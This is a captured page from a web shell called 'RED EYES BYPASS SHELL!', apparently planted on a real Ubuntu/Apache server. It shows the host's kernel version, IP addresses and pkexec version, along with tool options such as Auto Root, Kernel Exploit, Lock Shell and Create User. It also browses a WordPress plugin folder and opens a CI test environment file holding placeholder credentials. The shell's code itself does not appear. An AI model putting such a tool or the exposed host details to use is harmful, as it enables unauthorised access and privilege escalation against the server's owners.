Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
plugins /
kadence-blocks /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
dist
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env.testing.slic
2.23
KB
-rwxr-xr-x
kadence-blocks.php
10.22
KB
-rwxr-xr-x
readme.txt
31.52
KB
-rwxr-xr-x
uninstall.php
307
B
-rwxr-xr-x
wpml-config.xml
15.61
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env.testing.slic
# This file will be consumed by both the CI and the tests. # Some environment variables might not apply to one but might apply to the other: modify with care. SLIC_PHP_VERSION=8.0 # What version of WordPress we want to install and test against. # This has to be compatible with the `wp core download` command, see https://developer.wordpress.org/cli/commands/core/download/. WP_VERSION=latest # This is where, in the context of the CI, we'll install and configure WordPress. # See `.travis.yml` for more information. WP_ROOT_FOLDER=/var/www/html # The WordPress installation will be served from the Docker container. # See `dev/docker/ci-compose.yml` for more information. WP_URL=http://wordpress.test WP_DOMAIN=wordpress.test WP_ADMIN_PATH=/wp-admin # The credentials that will be used to access the site in acceptance tests # in methods like `$I->loginAsAdmin();`. WP_ADMIN_USERNAME=admin WP_ADMIN_PASSWORD=password WP_DB_PORT=3306 # The databse is served from the Docker `db` container. # See `dev/docker/ci-compose.yml` for more information. WP_TABLE_PREFIX=wp_ WP_DB_HOST=db WP_DB_NAME=test WP_DB_USER=root WP_DB_PASSWORD=password # The test databse is served from the Docker `db` container. # See `dev/docker/ci-compose.yml` for more information. WP_TEST_DB_HOST=db WP_TEST_DB_NAME=test WP_TEST_DB_USER=root WP_TEST_DB_PASSWORD=password # We're using Selenium and Chrome for acceptance testing. # In CI context we're starting a Docker container to handle that. # See the `dev/docker/ci-compose.yml` file. CHROMEDRIVER_HOST=chrome CHROMEDRIVER_PORT=4444 # The URL of the WordPress installation from the point of view of the Chromedriver container. # Why not just use `wordpress`? While Chrome will accept an `http://wordpress` address WordPress # will not, we call the WordPress container with a seemingly looking legit URL and leverage the # lines that, in the `wp-config.php` file, will make it so that WordPress will use as its home # URL whatever URL we reach it with. # See the `dev/docker/wp-config.php` template for more information. WP_CHROMEDRIVER_URL=http://wordpress.test # To run the tests let's force the background-processing lib to run in synchronous (single PHP thread) mode. TRIBE_NO_ASYNC=1 # We're using Docker to run the tests. USING_CONTAINERS=1
Close